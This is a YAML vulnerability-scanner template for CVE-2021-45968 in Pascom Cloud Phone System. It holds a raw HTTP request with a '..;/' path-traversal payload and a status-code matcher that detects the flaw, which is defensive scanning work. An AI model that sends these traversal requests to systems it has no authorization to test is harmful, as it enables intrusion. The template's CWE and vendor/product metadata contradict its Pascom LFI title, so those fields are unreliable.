id: CVE-2021-45968 info: name: Pascom CPS - Local File Inclusion author: dwisiswant0 severity: high description: | Pascom packaged with Cloud Phone System (CPS) versions before 7.20 contain a known local file inclusion vulnerability. impact: | The vulnerability can be exploited by an attacker to gain unauthorized access to sensitive information, execute arbitrary code, or perform other malicious activities. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Local File Inclusion vulnerability in Pascom CPS. reference: - https://kerbit.io/research/read/blog/4 - https://www.pascom.net/doc/en/release-notes/ - https://tutorialboy24.blogspot.com/2022/03/the-story-of-3-bugs-that-lead-to.html - https://nvd.nist.gov/vuln/detail/CVE-2021-45968 - https://jivesoftware.com/platform/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-45968 cwe-id: CWE-918 epss-score: 0.01877 epss-percentile: 0.87082 cpe: cpe:2.3:a:jivesoftware:jive:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jivesoftware product: jive tags: cve,cve2021,pascom,lfi,jivesoftware http: - raw: - | GET /services/pluginscript/ HTTP/1.1 Host: {{Hostname}} GET /services/pluginscript/..;/..;/ HTTP/1.1 Host: {{Hostname}} GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code_2 != status_code_1" condition: and # digest: 490a0046304402205c3d5f45720216456bee868ad6d077e7184cf777031d8adef191b91935f86556022018dd04a4863b1ec599d06c02fee6577f1cb462e10d6722af23ab9b187e1a6211:922c64590222798bb761d5b6d8e72950